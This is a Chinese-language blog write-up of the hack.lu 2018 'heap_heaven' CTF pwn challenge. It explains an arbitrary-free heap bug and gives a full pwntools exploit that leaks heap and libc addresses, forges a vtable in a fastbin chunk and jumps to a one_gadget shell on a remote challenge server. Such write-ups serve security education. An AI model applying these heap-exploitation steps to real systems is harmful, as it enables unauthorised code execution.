ha1vk's blog
0%

hack_lu_2018_heap_heaven

发表于 分类于

首先,检查一下程序的保护机制

然后我们用IDA分析一下,这个free没有检查范围,因此可以任意地址free。

我们只要想办法free掉state,然后控制funcs指针,即可执行任意代码

但是程序中我们不能自己malloc,因此无法将其再申请回来进行控制。查看state结构体

其位置与堆块的fd位置一样,因此,我们首先在fastbin里放一个chunk,然后再free掉state,这样,funcs就指向了第一个chunk,而funcs是一个虚表指针,因此,我们只需在第一个chunk里事先伪造好虚表即可。

而show功能,其使用的是*v2,因此,我们free掉一个unsorted bin范围的chunk,那么puts(*v2)也就是puts(main_arena_88),可以泄露出top chunk的地址,从而可以得到state的地址,然后再利用edit低字节覆盖指针,继续泄露libc地址等。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#coding:utf8
from pwn import *

#sh = process('./hack_lu_2018_heap_heaven',env={'LD_PRELOAD':'./libc-2.23.so'})
sh = remote('node3.buuoj.cn',27447)
libc = ELF('./libc-2.23.so')
malloc_hook_s = libc.symbols['__malloc_hook']
one_gadget = 0xf02a4

def edit(offset,size,payload):
   sh.sendlineafter('[5] : exit','1')
   sh.sendlineafter('write?',str(size))
   sh.sendlineafter('offset?',str(offset))
   sleep(0.1)
   sh.send(payload)

def delete(offset):
   sh.sendlineafter('[5] : exit','3')
   sh.sendlineafter('free?',str(offset))

def show(offset):
   sh.sendlineafter('[5] : exit','4')
   sh.sendlineafter('leak?',str(offset))

fake_chunk = p64(0) + p64(0x91)
fake_chunk += 'a'*0x80
fake_chunk += p64(0) + p64(0x21)
fake_chunk += 'b'*0x10
fake_chunk += p64(0) + p64(0x21)
fake_chunk += 'c'*0x10
edit(0,len(fake_chunk),fake_chunk)

delete(0x10)
show(0x10)
sh.recvuntil('\n')
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
edit(0x10,1,p8(0x89))
show(0x10)
sh.recvuntil('\n')
mmap_addr = u64('\x00' + sh.recvuntil('\n',drop = True).ljust(7,'\x00'))
print 'mmap_addr=',hex(mmap_addr)
edit(0x10,1,p8(0x98))
show(0x10)
sh.recvuntil('\n')
main_arena_88 = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
one_gadget_addr = libc_base + one_gadget
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'one_gadget_addr=',hex(one_gadget_addr)

fake_chunk = p64(0) + p64(0x21)
fake_chunk += 'a'*0x10
fake_chunk += p64(0) + p64(0x21)
fake_chunk += 'b'*0x10
edit(0,len(fake_chunk),fake_chunk)
#放入一个chunk到fastbin
delete(0x10)
edit(0x8,8,p64(one_gadget_addr)) #布置虚表指针

state_addr = heap_addr - 0x30
delete(state_addr - mmap_addr) #将fake_chunk连接到state的fd处,也就是覆盖了原来的虚表指针,指向我们可以控制的地方,布下了one_gadget函数指针

sh.interactive()